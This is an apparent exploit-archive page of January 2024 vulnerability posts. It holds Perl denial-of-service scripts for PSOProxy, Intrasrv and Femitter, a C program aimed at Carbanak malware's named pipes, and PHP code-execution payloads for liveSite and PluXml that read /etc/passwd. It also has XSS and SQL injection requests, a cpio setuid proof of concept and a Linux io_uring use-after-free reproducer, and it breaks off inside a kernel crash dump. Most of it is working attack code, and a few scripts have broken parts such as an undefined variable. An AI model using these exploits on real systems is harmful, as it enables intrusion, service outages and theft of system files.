<pre><code>#!/usr/bin/perl<br /><br />use IO::Socket::INET;<br /><br /># Exploit Title: PSOProxy 0.5 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 10 january 2024<br /># Vendor Homepage: https://sourceforge.net/projects/psoproxy/files/psoproxy/0.5/<br /># Download to demo: https://drive.google.com/file/d/1GC2GWGOx9Z1vWT_mxnGXHuTptuHa7lIp/view?usp=sharing<br /># Download to demo 2: https://drive.google.com/file/d/1DHQ1sZL3mqlqFWn50eq7FLVtzX3E6qgC/view?usp=sharing<br /># Notification vendor: No reported<br /># Tested Version: PSOProxy 0.5<br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Vídeo: https://www.youtube.com/watch?v=0uuUqfpRbHM<br /><br />#1. Description<br /><br />#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server did not properly handle request with large amounts of data to web server.<br />#The following request sends a large amount of data to the web server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /><br />print "\t ==> Connecting to webserver... \n\n";<br />sleep(1);<br /><br />my $i=0;<br /> print "\t ==> Exploiting... \n\n";<br />while ($i <= 9) {<br /> my $sock = IO::Socket::INET->new(<br /> PeerAddr => $ip,<br /> PeerPort => $port,<br /> Proto => 'tcp',<br /> ) or die "Cannot connect to $ip:$port: $!\n";<br /><br /> my $buffer = "A" x 3000;<br /> my $shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .<br /> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";<br /> <br /> $buffer .= "\x0F\x98\xF8\x77" . $shellcode;<br /><br /> print $sock $buffer . "\r\n";<br /> close($sock);<br /> <br /> $i++;<br />}<br /> <br />print "\t ==> Done! Exploited!";<br /> sub intro {<br /> print q {<br /><br /> ,--,<br /> _ ___/ /\|<br /> ,;'( )__, ) ~<br /> // // '--; <br /> ' \ | ^<br /> ^ ^<br /><br /> [+] PSOProxy 0.5 - Denial of Service (DoS)<br /><br /> [*] Coded by Fernando Mengali<br /><br /> [@] e-mail: fernando.mengalli@gmail.com<br /><br /> }<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print "\n\tUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /><br />#3. Solution/ How to fix:<br /><br /># This version product is deprecated<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024<br />Original source: https://malvuln.com/advisory/b8e1e5b832e5947f41fd6ae6ef6d09a1.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32 Carbanak (Anunak)<br />Vulnerability: Named Pipe Null DACL<br />Family: Carbanak<br />Type: PE32<br />MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1<br />Vuln ID: MVID-2024-0667<br />Dropped files: AlhEXlUJ.exe, AlhEXlUJbVpfX1EMVw.bin<br />Disclosure: 01/09/2024<br /><br />Description: Carbanak malware creates 8 named pipes used for C2 and interprocess communications and grants RW access to the Everyone user group.<br />Low privileged users can modify the pipes DACLs, removing rights for Everyone denying access to all users. First 6 pipes are created by its parent process<br />and last 2 by the child process. The pipes names are randomly generated each time it is run all except for one JFNfVUYDXmlZQV.<br /><br />Therefore, we can detect Carbanak by that one pipe, as the "JFNfVUYDXmlZQVI" pipe is always created regardless of other randomly named pipes.<br />Listing Carbanaks named pipes they get grouped as they are created at same time with 2 of them listed prior to the JFNfVUYDXmlZQVI pipe.<br /><br />Carbanak creates a directory named "Mozilla" under ProgramData with hidden files, one of which is AlhEXlUJ.exe used by the service it creates <br />which runs as SYSTEM. The malwares service names created seem to use an already existing service name and add "Sys" at the end of its name.<br /><br />Exploitation steps, output all named pipes and look for "JFNfVUYDXmlZQVI" if detected, exploit the DACL on 2 previously listed pipes and 5 pipes listed after.<br /><br />Successfully tested in VM environment.<br /><br />Carbanak IPC Named Pipes:<br /><br />\\.\Pipe\cltjLnYRKKjUESTvgGdmERTb <br /> RW Everyone<br />\\.\Pipe\tGYNSgZvVXwumEhdcF <br /> RW Everyone<br />\\.\Pipe\JFNfVUYDXmlZQVI <===== ALWAYS CREATED<br /> RW Everyone<br />\\.\Pipe\PoUXbOHFRuUZAufnlpMZoqdtIfOX<br /> RW Everyone<br />\\.\Pipe\oBcVHguxbnjGbSgkJptifqvNFgD<br /> RW Everyone<br />\\.\Pipe\iDToHxpSCbEIEHPBeQ<br /> RW Everyone<br />\\.\Pipe\YutsGUYwwUusszByeuXUQK<br /> RW Everyone<br />\\.\Pipe\UfnQmAUTVtEkYvMoUWAZekAuWZHe<br /> RW Everyone<br /><br />Exploit/PoC:<br />#include "windows.h"<br />#include "stdio.h"<br />#include "accctrl.h"<br />#include "aclapi.h"<br /><br />/*<br />Carbanak: 48d208b87b29d50bb160f336c94b681e232b0f90e8c02175e593d60737369c13<br />DACL IPC named pipes created and grants RW access for Everyone.<br />We can identify Carbanak as out of the eight pipes it creates with random names the pipe<br />named JFNfVUYDXmlZQVI is always created. Pipes are typically grouped as they are created<br />at same time and typically 2 are previous to pipe JFNfVUYDXmlZQVI and others are created after<br />Output named pipes find JFNfVUYDXmlZQVI and exploit DACL on 2 previous and 5 after.<br />Successfully tested in VM environment.<br />By Malvuln<br />**/<br /><br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />#define CARBANAK_PIPE "JFNfVUYDXmlZQVI"<br />#define MAX_TOKENS 1024<br />#define DELIMITER "\n"<br /><br />int str2Array(char*** argv, char *str);<br />int Exploit(char *carbanak_pipe);<br /><br />int str2Array(char*** argv, char *str){<br />char* buffer;<br />int argc;<br />buffer = (char *) malloc(strlen(str) * sizeof(char));<br />strcpy(buffer, str);<br />(*argv) = (char**) malloc(MAX_TOKENS * sizeof(char**));<br /> argc = 0; <br /> (*argv)[argc++] = strtok(buffer, DELIMITER);<br /> while ((((*argv)[argc] = strtok(NULL, DELIMITER)) != NULL) &&<br /> (argc < MAX_TOKENS)) ++argc;<br />return argc;<br />}<br /><br />int main(void){<br /><br />system("dir /b \\\\.\\pipe\\\\ > tmp.sys");<br /><br />int ch;<br />char tmp[1];<br />FILE *fp = fopen("tmp.sys", "r");<br />fseek(fp, 0, SEEK_END);<br />int bytes = ftell(fp) + 256;<br />rewind(fp);<br />char x[bytes];<br /> while((ch = fgetc(fp)) != EOF){<br /> if(feof(fp)){<br /> break;<br /> }<br /> sprintf(tmp, "%c", ch);<br /> strcat(x, tmp);<br />}<br />fclose(fp);<br /><br />char **A;<br />int i, result = str2Array(&A, x);<br />int delay = 300;<br />int rc;<br />BOOL infected=FALSE;<br /><br />for(i=0;i<result;i++){<br /> <br /> if(strcmp(A[i], CARBANAK_PIPE)==0){<br /> printf("[+] Carbanak (Anunak) malware IPC exploit\n");<br /> printf("[!] MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1\n");<br /> printf("[!] Named Pipe %s%s\n", CARBANAK_PIPE, " detected!");<br /> printf("[+] Attack started...\n\n");<br /> <br /> infected = TRUE;<br /><br /> Exploit(A[i]);<br /> Sleep(delay);<br /> <br /> Exploit(A[i-2]);<br /> Sleep(delay);<br /><br /> Exploit(A[i-1]);<br /> Sleep(delay);<br /> <br /> Exploit(A[i+1]);<br /> Sleep(delay);<br /> <br /> Exploit(A[i+2]);<br /> Sleep(delay);<br /> <br /> Exploit(A[i+3]);<br /> Sleep(delay);<br /> <br /> Exploit(A[i+4]);<br /> Sleep(delay);<br /> <br /> rc = Exploit(A[i+5]);<br /> }<br />}<br /> if(!infected){<br /> printf("[+] Carbanak (Anunak) malware IPC Exploit \n");<br /> printf("[+] MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1\n");<br /> printf("[!] Named Pipe %s%s", CARBANAK_PIPE, " not found on the system.\n");<br /> printf("[!] Aborting...");<br /> }<br /> if(rc==0){<br /> printf("\n[!] Done!"); <br /> }<br /> printf("\n[+] By Malvuln circa 2024\n\n");<br /> system("pause");<br /> <br />return 0;<br />}<br /><br /><br />int Exploit(char *malpipe){<br /> <br /> char MALPIPE_PREFIX[269] = "\\\\.\\pipe\\";<br /> strcat(MALPIPE_PREFIX, malpipe);<br /> HANDLE hPipe = CreateFileA((LPCSTR)MALPIPE_PREFIX, GENERIC_WRITE | WRITE_DAC, 0, NULL, OPEN_EXISTING, 0, NULL);<br /> <br /> PACL pOldDACL = NULL;<br /> PACL pNewDACL = NULL;<br /> <br />if (hPipe == INVALID_HANDLE_VALUE){ <br /> int rc = GetLastError();<br /> if(rc==5){<br /> printf("[!] Access Denied for pipe: %s\n", malpipe);<br /> }<br /> return 1;<br />}<br /> <br /> if(GetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) != ERROR_SUCCESS){<br /> printf("[!] Error: %d", GetLastError());<br /> return 1;<br /> }<br /> <br /> TRUSTEE trustee[1];<br /> trustee[0].TrusteeForm = TRUSTEE_IS_NAME;<br /> trustee[0].TrusteeType = TRUSTEE_IS_GROUP;<br /> trustee[0].ptstrName = TEXT("Everyone");<br /> trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;<br /> trustee[0].pMultipleTrustee = NULL;<br /><br /> EXPLICIT_ACCESS explicit_access_list[1];<br /> ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));<br /><br /> explicit_access_list[0].grfAccessMode = DENY_ACCESS; <br /> explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;<br /> explicit_access_list[0].grfInheritance = NO_INHERITANCE;<br /> explicit_access_list[0].Trustee = trustee[0];<br /> <br /> if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){<br /> printf("[!] Error: %d", GetLastError());<br /> return 1;<br /> }<br /> <br /> if(SetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){ <br /> printf("[!] Error: %d", GetLastError());<br /> return 1; <br /> }else{<br /> printf("[+] Modifying IPC Pipe DACL ==> %s\n", MALPIPE_PREFIX);<br /> }<br /> <br /> LocalFree(pNewDACL);<br /> LocalFree(pOldDACL);<br /> CloseHandle(hPipe);<br /> <br /> return 0;<br />}<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).</code></pre>
<pre><code>## Exploit Title: liveSite Version : 2019.1 Remote Code Execution<br />### Date: 2024-1-9<br />### Exploit Author: tmrswrr<br />### Category: Webapps<br />### Vendor Homepage: https://livesite.com/<br />### Version : 2019.1<br />### Tested on: https://www.softaculous.com/apps/cms/liveSite<br /><br />1 ) Login with admin cred Click Staff Home > Edit > Designer Region Name:megamenu , write in HTML Code Snippet your payload : https://127.0.0.1/liveSite/livesite/edit_designer_region.php?id=193&send_to=%2FliveSite%2Fstaff-home<br /> <br /> Payload : <?php echo system('cat /etc/passwd'); ?><br /><br />2 ) After save you will be see result : http://127.0.0.1/liveSite/staff-home<br /><br /> Result: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:998:997:User for polkitd:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:997:995::/var/lib/chrony:/sbin/nologin soft:x:1000:1000::/home/soft:/sbin/nologin saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin emps:x:995:1001::/home/emps:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin vmail:x:5000:5000::/var/local/vmail:/bin/bash pinguzo:x:992:992::/etc/pinguzo:/bin/false webuzo:x:987:987::/home/webuzo:/bin/bash apache:x:986:985::/home/apache:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false<br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br />use IO::Socket;<br /><br /># Exploit Title: Intrasrv Simple Web Server 1.0 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 09 january 2024<br /># Vendor Homepage: http://www.leighb.com/intrasrv.htm<br /># Download to demo: http://www.leighb.com/intrasrv.zip<br /># Download 2 to demo: https://drive.google.com/file/d/1HuUGIGMp_L6viM-j6djGICsyxZg_SJtB/view?usp=sharing<br /># Notification vendor: No reported<br /># Tested Version: Intrasrv Simple Web Server 1.0<br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Vídeo: https://www.youtube.com/watch?v=9u77LwLgXzU<br /># Vídeo 2: https://drive.google.com/file/d/1GDVpLx5YfWdhI3ZQcG5P0EWvuR25SEjW/view?usp=sharing<br /><br />#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server did not properly handle request with large amounts of data via method GET to web server.<br />#The following request sends a large amount of data to the web server to process across method GET, the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> my $sis="$^O";<br /> our $cmd;<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... \n";<br /><br />my $buffer1 = "\x41"x4674;<br /><br />my $buffer2 = "\x41" x 638;<br /><br />my $buffer = "GET / HTTP/1.1\r\n";<br />$buffer .= "Host: " . $buffer1 . "\r\n";<br />$buffer .= "User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n";<br />$buffer .= $buffer2;<br /><br />my $one = IO::Socket::INET->new(<br /> PeerAddr => $ip,<br /> PeerPort => $port,<br /> Proto => 'tcp',<br />) or die "Could not connect to $ip: $!\n";<br /><br />print $one $buffer;<br />close $one;<br /><br /> print "[+] Done - Exploited success!!!!!\n\n";<br /> <br /> sub intro {<br /> print "********************************************************\n";<br /> print "* Intrasrv Simple Web Server 1.0 - Denied of Service *\n";<br /> print "* *\n";<br /> print "* Coded by Fernando Mengali *\n";<br /> print "* *\n";<br /> print "* e-mail: fernando.mengalli\@gmail.com *\n";<br /> print "* *\n";<br /> print "*******************************************************\n";<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /><br />#3. Solution/ How to fix:<br /><br /># This version product is deprecated<br /></code></pre>
<pre><code>;; PostAuth SQLi in AdvantechWeb/SCADA 9.1.5U<br />;; <br />;; found: 28.12.2023<br />;;<br />;; more: <br />;; https://code610.blogspot.com/2024/01/postauth-sqli-in-advantechwebscada-915u.html<br />;; <br /><br /><br />POST /waconfig/api/odbc/getSystemLog HTTP/2<br />Host: 192.168.56.106<br />Cookie: serverLanguage=en; csrfToken=a2db29e5-68f5-4cae-917c-41767ee92911-1837; pcname=MSEDGEWIN10; rpcPort=4592; accessCode=qweqwe; socketPort=14592; account=admin; ASPSESSIONIDQWBDCRDA=MCKNMBPCPEFMMGDHFCIICAGA; ASPSESSIONIDQSBDCRDA=NCKNMBPCOGIENOGNONBOFBFF; ASP.NET_SessionId=zgqgjalvaa0x1kpcdj3ke2di; user=name=; ASPSESSIONIDCGTAATDA=OCEJBDPCJIJLPKAFFGOGHPAN<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0<br />Accept: application/json, text/plain, */*<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/json;charset=utf-8<br />Content-Length: 359<br />Origin: https://192.168.56.106<br />Referer: https://192.168.56.106/waconfig/index<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />Connection: keep-alive<br /><br />{"csrfToken":"a2db29e5-68f5-4cae-917c-41767ee92911-1837","StartDateTime":"12/28/2023 00:00:00","EndDateTime":"12/28/2023 22:20:46","Action":[2,3,4,5,6,7,8,9,10,11,13,14,15,16,12],"UserName":"ALL","IPAddress":"ALL","NodeName":"ALL","ProjName":"ALL","Orders":[{"ColumnName":"%27>%22><svg/onload=prompt(123)>","descending":"DESC"}],"PageSize":50,"CurrentPage":1}<br /><br /><br /><br />resp:<br /><br />HTTP/2 200 OK<br />Cache-Control: no-cache<br />Pragma: no-cache<br />Content-Length: 225<br />Content-Type: application/json; charset=utf-8<br />Expires: -1<br />Server: Microsoft-IIS/10.0<br />X-Ua-Compatible: IE=EmulateIE7<br />Access-Control-Allow-Origin: http://localhost:8080<br />Access-Control-Allow-Methods: GET,POST,OPTIONS<br />Access-Control-Allow-Headers: Content-Type<br />Access-Control-Allow-Credentials: true<br />Strict-Transport-Security: max-age=31536000;includeSubDomains;preload<br />X-Content-Type-Options: nosniff<br />Date: Thu, 28 Dec 2023 21:29:56 GMT<br /><br />{"error":-500,"reason":"Exception captured by WebApiExceptionFilter: ERROR [42000] [Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression \u0027%27\u003e%22\u003e\u003csvg/onload=prompt(123)\u003e\u0027."}<br /><br /> <br />;; cheers<br />;;<br /></code></pre>
<pre><code>cpio privilege escalation vulnerability via setuid files in cpio archive<br /><br />Happy New Year, let in 2024 happiness be with you! :)<br /><br />When extracting archives cpio (at least version 2.13) preserves<br />the setuid flag, which might lead to privilege escalation.<br /><br />One example is r00t extracts to /tmp/ and scidiot runs /tmp/micq/backd00r<br />without further interaction from root.<br /><br />We believe this is vulnerability, since directory traversal in cpio<br />is considered vulnerability.<br /><br />The POC is trivial, including bash script.<br /><br /><pre><br />====<br />#!/bin/bash<br /># cpio privilege escalation via setuid files in cpio archive<br /># author: Georgi Guninski<br /># date: Mon Jan 8 07:28:28 AM UTC 2024<br /># tested on cpio (GNU cpio) 2.13<br /><br />mkdir -p /tmp/1<br />cd /tmp/1<br />touch a<br />chmod 4555 a<br />echo -n a | cpio -ocv0 > a.cpio<br />mkdir -p /tmp/2<br />cd /tmp/2<br />cpio -iv < ../1/a.cpio<br />ls -lh /tmp/2/a<br />#-r-sr-xr-x. 1 joro joro 0 Jan 8 09:10 /tmp/2/a<br />====<br /></pre><br /></code></pre>
<pre><code># Exploit Title: iGalerie Version: 3.0.22 - Reflected XSS <br /># Date: 2024-7-1<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://www.igalerie.org/<br /># Version: 3.0.22<br /># Tested on: https://softaculous.com/demos/iGalerie<br /><br /><br /><br />1 ) Go to home page and click edit > https://127.0.0.1/iGalerie/<br /> <br /> Titre : "><sVg/onLy=1 onLoaD=confirm(1)//<br /><br />2 ) Write in titre your payload , after save will be see alert button.<br /><br /><br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br />use Net::FTP;<br /><br /># Exploit Title: Femitter FTP Server 1.03 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 08 january 2024<br /># Vendor Homepage: https://acritum.com/<br /># Download to demo: https://drive.google.com/file/d/1GBFmc7tMavA9mMoZPYVlUVUe62dGjBhF/view?usp=sharing<br /># Notification vendor: No reported<br /># Tested Version: Femitter FTP Server 1.03<br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Vídeo: https://drive.google.com/file/d/1n_WzyNiOwHRen60en5rh56Q4AyDfVbF_/view?usp=sharing<br /><br />#1. Description<br /><br />#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server does not correctly handle the amount of data or bytes of the command RETR, resulting in memory corruption.<br />#When authenticating to the FTP server with a long RETR or a RETR with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... \n";<br /><br /> my $payload = "\x41\x2C\x41\x20\x42"x500;<br /><br /> my $ftp = Net::FTP->new($ip, Debug => 0) or die "Could not connect: $@";<br /><br /> my $sc= "A"x800;<br /><br /> $ftp->login("anon","anon") or die "Failed: " . $ftp->message;<br /><br /> $ftp->quot("RETR ".$c."\r\n") or die "Error: " . $ftp->message;<br /> $ftp->quot("RETR ".$c."\r\n") or die "Error: " . $ftp->message;<br /><br /> $ftp->quit;<br /><br /> print "[+] Done - Exploited success!!!!!\n\n";<br /> <br /> sub intro {<br /> print "######################################################################\n";<br /> print "# Femitter FTP Server 1.03 - Denial of Service #\n";<br /> print "# #\n";<br /> print "# Coded by Fernando Mengali #\n";<br /> print "# #\n";<br /> print "# e-mail: fernando.mengalli\@gmail.com #\n";<br /> print "# #\n";<br /> print "######################################################################\n";<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /><br />#3. Solution/ How to fix:<br /><br /># This version product is deprecated<br /></code></pre>
<pre><code>## Exploit Title: PluXml Blog Version : 5.8.9 - Remote Code Execution (Authenticated)<br />### Date: 2024-1-7<br />### Exploit Author: tmrswrr<br />### Category: Webapps<br />### Vendor Homepage: https://pluxml.org/<br />### Version : 5.8.9<br />### Tested on: https://www.softaculous.com/apps/cms/PluXml<br /><br />1 ) After login Click Static pages > Edit > Write in content your payload : https://127.0.0.1/PluXml/core/admin/statique.php?p=001<br /><br /> Payload : <?php echo system('id'); ?><br /><br />2 ) Save and View page Static 1 on site :https://127.0.0.1/PluXml/static1/static-1<br /><br /> Result: uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft) <br /> <br /><br /><br /><br /></code></pre>
<pre><code>Linux >=6.4: io_uring: page UAF via buffer ring mmap<br /><br />Since commit c56e022c0a27 (\"io_uring: add support for user mapped provided<br />buffer ring\"), landed in Linux 6.4, io_uring makes it possible to allocate,<br />mmap, and deallocate \"buffer rings\".<br /><br />A \"buffer ring\" can be allocated with<br />io_uring_register(..., IORING_REGISTER_PBUF_RING, ...) and later deallocated<br />with io_uring_register(..., IORING_UNREGISTER_PBUF_RING, ...).<br />It can be mapped into userspace using mmap() with offset<br />IORING_OFF_PBUF_RING|..., which creates a VM_PFNMAP mapping, meaning the MM<br />subsystem will treat the mapping as a set of opaque page frame numbers not<br />associated with any corresponding pages; this implies that the calling code is<br />responsible for ensuring that the mapped memory can not be freed before the<br />userspace mapping is removed.<br /><br />However, there is no mechanism to ensure this in io_uring: It is possible to<br />just register a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and then<br />free the buffer ring's pages with IORING_UNREGISTER_PBUF_RING, leaving free<br />pages mapped into userspace, which is a fairly easily exploitable situation.<br /><br />reproducer:<br /><br />==============================================================<br />#define _GNU_SOURCE<br />#include <unistd.h><br />#include <err.h><br />#include <string.h><br />#include <stdio.h><br />#include <ctype.h><br />#include <sys/syscall.h><br />#include <sys/mman.h><br />#include <linux/io_uring.h><br /><br />#define SYSCHK(x) ({ \\<br /> typeof(x) __res = (x); \\<br /> if (__res == (typeof(x))-1) \\<br /> err(1, \"SYSCHK(\" #x \")\"); \\<br /> __res; \\<br />})<br /><br />int main(void) {<br /> struct io_uring_params params = {<br /> .flags = IORING_SETUP_NO_SQARRAY<br /> };<br /> int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, &params));<br /> printf(\"uring_fd = %d\<br />\", uring_fd);<br /><br /> struct io_uring_buf_reg reg = {<br /> .ring_entries = 1,<br /> .bgid = 0,<br /> .flags = IOU_PBUF_RING_MMAP<br /> };<br /> SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING, &reg, 1));<br /><br /> void *pbuf_mapping = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_PBUF_RING));<br /> printf(\"pbuf mapped at %p\<br />\", pbuf_mapping);<br /><br /> struct io_uring_buf_reg unreg = { .bgid = 0 };<br /> SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_UNREGISTER_PBUF_RING, &unreg, 1));<br /> while (1) {<br /> memset(pbuf_mapping, 0xaa, 0x1000);<br /> usleep(100000);<br /> }<br />}<br />==============================================================<br /><br />When run on a system with the debug options:<br /><br /> CONFIG_PAGE_TABLE_CHECK=y<br /> CONFIG_PAGE_TABLE_CHECK_ENFORCED=y<br /><br />, this will splat with the following error, when __page_table_check_zero()<br />detects that a page that's being freed is still mapped into userspace:<br /><br />==============================================================<br />------------[ cut here ]------------<br />kernel BUG at mm/page_table_check.c:146!<br />invalid opcode: 0000 [#1] PREEMPT SMP KASAN<br />CPU: 1 PID: 554 Comm: uring-mmap-pbuf Not tainted 6.7.0-rc3 #360<br />Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014<br />RIP: 0010:__page_table_check_zero+0x136/0x150<br />Code: a8 40 0f 84 1f ff ff ff 48 8d 7b 48 e8 93 8a fd ff 48 8b 6b 48 40 f6 c5 01 0f 84 08 ff ff ff 48 83 ed 01 e9 02 ff ff ff 0f 0b <0f> 0b 0f 0b 0f 0b 5b 48 89 ef 5d 41 5c 41 5d 41 5e e9 f4 ea ff ff<br />RSP: 0018:ffff888029aa7c70 EFLAGS: 00010202<br />RAX: 0000000000000001 RBX: ffff8880011789f0 RCX: dffffc0000000000<br />RDX: 0000000000000007 RSI: ffffffff83ca598e RDI: ffff8880011789f4<br />RBP: ffff8880011789f0 R08: 0000000000000000 R09: ffffed100022f13e<br />R10: ffff8880011789f7 R11: 0000000000000000 R12: 0000000000000000<br />R13: ffff8880011789f4 R14: 0000000000000001 R15: 0000000000000000<br />FS: 00007f745f01a500(0000) GS:ffff88806d280000(0000) knlGS:0000000000000000<br />CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033<br />CR2: 00005610bbfb8008 CR3: 0000000016ac3004 CR4: 0000000000770ef0<br />PKRU: 55555554<br />Call Trace:<br /> <TASK><br />[...]<br /> free_unref_page_prepare+0x282/0x450<br /> free_unref_page+0x45/0x170<br /> __io_remove_buffers.part.0+0x38c/0x3c0<br /> io_unregister_pbuf_ring+0x146/0x1e0<br />[...]<br /> __do_sys_io_uring_register+0xa03/0x11c0<br />[...]<br /> do_syscall_64+0x43/0xf0<br /> entry_SYSCALL_64_after_hwframe+0x6e/0x76<br />RIP: 0033:0x7f745ef4bf59<br />Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 